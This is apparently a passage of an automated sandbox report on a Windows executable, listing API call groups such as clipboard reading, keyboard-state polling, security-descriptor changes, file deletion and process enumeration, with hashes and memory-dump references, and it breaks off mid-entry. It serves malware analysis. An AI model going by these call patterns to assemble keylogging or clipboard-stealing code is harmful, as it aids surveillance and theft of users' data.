                                                                                                                                                                                                              • API ID: LongProcWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3265722593-0
                                                                                                                                                                                                              • Opcode ID: 38239b2c1765ec518f949edb15f9abaf0a3ca4df9038bb976fb640a769bdff84
                                                                                                                                                                                                              • Instruction ID: 2c558d5e2dbc7c443af5e20147ce62a10b358ecc7973541657d248d7067aaccf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38239b2c1765ec518f949edb15f9abaf0a3ca4df9038bb976fb640a769bdff84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02E0C230104204FBCF05AF90CC19F283B2AFB58300F208059FA451A3A1CB73A521DF14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00BD13C8
                                                                                                                                                                                                                • Part of subcall function 00BD29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BD29F3
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetCursorPos.USER32(?), ref: 00BD2727
                                                                                                                                                                                                                • Part of subcall function 00BD2714: ScreenToClient.USER32(00C977B0,?), ref: 00BD2744
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetAsyncKeyState.USER32 ref: 00BD2769
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetAsyncKeyState.USER32 ref: 00BD2777
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4074248120-0
                                                                                                                                                                                                              • Opcode ID: fcfedbd4917911310889e1f8baaa366224bf14c69cb535626e67aca662f49326
                                                                                                                                                                                                              • Instruction ID: 39465f8b27bacbed6c46e5f842f10bb229cbf9f4bb737bf5219d1e9b27dd7fc0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcfedbd4917911310889e1f8baaa366224bf14c69cb535626e67aca662f49326
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55D05E702060505BC929AB1C9C59B5E7791EB55320B140A92F4159B3E2DA611D52CAA5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF3447: __lock.LIBCMT ref: 00BF3449
                                                                                                                                                                                                              • __onexit_nolock.LIBCMT ref: 00BF2E90
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00BF2E95,00C0B7EA,00C8CB50), ref: 00BF2ECB
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: DecodePointer.KERNEL32(?,?,00BF2E95,00C0B7EA,00C8CB50), ref: 00BF2ED6
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: __realloc_crt.LIBCMT ref: 00BF2F17
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: __realloc_crt.LIBCMT ref: 00BF2F2B
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: EncodePointer.KERNEL32(00000000,?,?,00BF2E95,00C0B7EA,00C8CB50), ref: 00BF2F3D
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: EncodePointer.KERNEL32(00C0B7EA,?,?,00BF2E95,00C0B7EA,00C8CB50), ref: 00BF2F4B
                                                                                                                                                                                                                • Part of subcall function 00BF2EB8: EncodePointer.KERNEL32(00000004,?,?,00BF2E95,00C0B7EA,00C8CB50), ref: 00BF2F57
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3536590627-0
                                                                                                                                                                                                              • Opcode ID: 1180d15e3c1f7ffc17e4f0229f0c79a3624fa3da611569c1e3eac231b34ee7fc
                                                                                                                                                                                                              • Instruction ID: 807e21a25b35198eaefabda4fea3fea6f641a012e143acca1e68d4cceb785a0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1180d15e3c1f7ffc17e4f0229f0c79a3624fa3da611569c1e3eac231b34ee7fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95D01271D1020DEBDB50BBA4D80277D76F06F00722F604194F514672C2CB740A4A5B95
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wfsopen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 197181222-0
                                                                                                                                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                                                              • Instruction ID: 6be1b1d161468a9478496675788e7ff256483e04885ecfec4c1775dd11bad813
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0B0927644020C77CE112A82EC03A693F699B40768F408060FB0C1D262A673E6A49689
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                              • Instruction ID: 9e1086b8d5200e6e32705c9feda5e457407a938730c0b2e91eb4344c501d9962
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B31B271A1010A9BDB18EF58C4C0979F7E6FF59300B648AE5E509CB666E731EDC5CB80
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: a13cecdf7caf6742772528f9127c7f9f7a60f0fed9a0069b898090b687847369
                                                                                                                                                                                                              • Instruction ID: 296f28168ddd6a2759c9875bc94d063a5431325e3904abc30fb1dd819c245d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a13cecdf7caf6742772528f9127c7f9f7a60f0fed9a0069b898090b687847369
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE09275410B41CFC3324F1BE804426FBE4FFE13613214A6EE1E692660D3B0589A8B50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenClipboard.USER32(00C60980), ref: 00C4465C
                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C4466A
                                                                                                                                                                                                              • GetClipboardData.USER32 ref: 00C44672
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00C4467E
                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00C4469A
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00C446A4
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C446B9
                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00C446C6
                                                                                                                                                                                                              • GetClipboardData.USER32 ref: 00C446CE
                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00C446DB
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C4470F
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00C4481F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3222323430-0
                                                                                                                                                                                                              • Opcode ID: e8b65db979dc5fd20c1ebeb378b4d14e9f70b9552ecde5770254eb1166c1465e
                                                                                                                                                                                                              • Instruction ID: 3f1bebea7e82129c33e799d225dae162a3388bc96bf126b47a3ed3800bab75db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8b65db979dc5fd20c1ebeb378b4d14e9f70b9552ecde5770254eb1166c1465e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9951A031244201ABD314EF65DC9AF6F77A8BF84B41F204529F956E21E1DFB0D9058B62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00C28E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C28E3C
                                                                                                                                                                                                                • Part of subcall function 00C28E20: GetLastError.KERNEL32(?,00C28900,?,?,?), ref: 00C28E46
                                                                                                                                                                                                                • Part of subcall function 00C28E20: GetProcessHeap.KERNEL32(00000008,?,?,00C28900,?,?,?), ref: 00C28E55
                                                                                                                                                                                                                • Part of subcall function 00C28E20: HeapAlloc.KERNEL32(00000000,?,00C28900,?,?,?), ref: 00C28E5C
                                                                                                                                                                                                                • Part of subcall function 00C28E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C28E73
                                                                                                                                                                                                                • Part of subcall function 00C28EBD: GetProcessHeap.KERNEL32(00000008,00C28916,00000000,00000000,?,00C28916,?), ref: 00C28EC9
                                                                                                                                                                                                                • Part of subcall function 00C28EBD: HeapAlloc.KERNEL32(00000000,?,00C28916,?), ref: 00C28ED0
                                                                                                                                                                                                                • Part of subcall function 00C28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C28916,?), ref: 00C28EE1
                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C28931
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00C28946
                                                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C28965
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00C28976
                                                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00C289B3
                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C289CF
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00C289EC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C289FB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00C28A02
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C28A23
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00C28A2A
                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C28A5B
                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C28A81
                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C28A95
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3996160137-0
                                                                                                                                                                                                              • Opcode ID: 74cdeb3b98e26c92032634908e6a1508884d4d83095d57cb8ef1d59b9b72f3c9
                                                                                                                                                                                                              • Instruction ID: 75cbcc5b4ab02736db927df08e24a6af1ac57d29cffc92237d83ac2a5372cb1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74cdeb3b98e26c92032634908e6a1508884d4d83095d57cb8ef1d59b9b72f3c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E661697590121AFFCF10DFA1EC45FAEBB79FF04301F14812AE825A6690DB759A09DB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00C30530
                                                                                                                                                                                                              • GetAsyncKeyState.USER32 ref: 00C305B1
                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00C305CC
                                                                                                                                                                                                              • GetAsyncKeyState.USER32 ref: 00C305E6
                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00C305FB
                                                                                                                                                                                                              • GetAsyncKeyState.USER32 ref: 00C30613
                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00C30625
                                                                                                                                                                                                              • GetAsyncKeyState.USER32 ref: 00C3063D
                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00C3064F
                                                                                                                                                                                                              • GetAsyncKeyState.USER32 ref: 00C30667
                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00C30679
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                              • Opcode ID: e813e1dbdcd44dae01028998d95758c659481e574ab88cf017f7310c3630170c
                                                                                                                                                                                                              • Instruction ID: d7f0c88c2b5665cc4184ba50bf0eb637d66dfe133b6510b3b04b52aac0c99292
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e813e1dbdcd44dae01028998d95758c659481e574ab88cf017f7310c3630170c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C41F831514BCA6DFF30866488253B6BFB06B51304F28405EE9D6571C2EBE49BD8CFA6
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C34451
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C3445E
                                                                                                                                                                                                                • Part of subcall function 00BF38C8: __woutput_l.LIBCMT ref: 00BF3921
                                                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00C34488
                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00C34494
                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00C344A1
                                                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00C344C1
                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00C344D3
                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00C344E2
                                                                                                                                                                                                              • LockResource.KERNEL32(?), ref: 00C344EE
                                                                                                                                                                                                              • CreateIconFromResourceEx.USER32 ref: 00C3454F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1433390588-0
                                                                                                                                                                                                              • Opcode ID: e375ca02aeeccfa5bf62e9fda7ef7d1735188f44e100a11ba9744e70dceaef5a
                                                                                                                                                                                                              • Instruction ID: 55f7d503f5855ac77ffc250072d10b2f19cf6734f1246df7875f55bba6a38132
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e375ca02aeeccfa5bf62e9fda7ef7d1735188f44e100a11ba9744e70dceaef5a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA31C17190121AABDB199FA1EC58BBF7BA9EF04340F144425FA26E3150D774EA15CBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BE2A58,?,00008000), ref: 00BF02A4
                                                                                                                                                                                                                • Part of subcall function 00C34FEC: GetFileAttributesW.KERNEL32(?,00C33BFE), ref: 00C34FED
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00C3407C
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C340CC
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C340DD
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00C340F4
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00C340FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2649000838-1173974218
                                                                                                                                                                                                              • Opcode ID: 33987b3a3567536f64a4f325e81eba70ab8a87e79420a48f91f040cbabfcc2fb
                                                                                                                                                                                                              • Instruction ID: f69f2574777f63052eda64ffdb251d2dae713481b01d4894ba5e80a0f2590ccf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33987b3a3567536f64a4f325e81eba70ab8a87e79420a48f91f040cbabfcc2fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4318E310183859BC318EF64C8959AFB7ECBE95304F544E6DF5E293192EB30EA09C762
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00C3C329
                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00C3C359
                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00C3C36E
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00C3C37F
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C3C3AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2387731787-0
                                                                                                                                                                                                              • Opcode ID: bad0caf48b0e08f812d8b14398431bb3372692997a0efa0391ed510ee19af0e9
                                                                                                                                                                                                              • Instruction ID: 964d80d67b47fce401a71df51f40dc1a09567f904a014f90be26160cbee03d34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bad0caf48b0e08f812d8b14398431bb3372692997a0efa0391ed510ee19af0e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E518A356146028FC714DF68D8D0EAEB3E8EF49310F10466DE96A973A1DB30AD04CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LocalTime__swprintf
                                                                                                                                                                                                              • String ID: %.3d$WIN_XPe
                                                                                                                                                                                                              • API String ID: 2070861257-2409531811
                                                                                                                                                                                                              • Opcode ID: 52f3ab7bd31d1159abb7bbf4a8b69a9e94847b54674dd3b94d1ff958718cb0b4
                                                                                                                                                                                                              • Instruction ID: ef912d38889aa1e934fa3179c8a6c14c7edd3fa711a88782cc1bd88cd94f79d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52f3ab7bd31d1159abb7bbf4a8b69a9e94847b54674dd3b94d1ff958718cb0b4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84D01271844109EAC7149B92C955EFA73BCBB0D304F344093F506A2040E7B58BD8BB26
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00C3416D
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00C3417B
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00C3419B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C34245
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
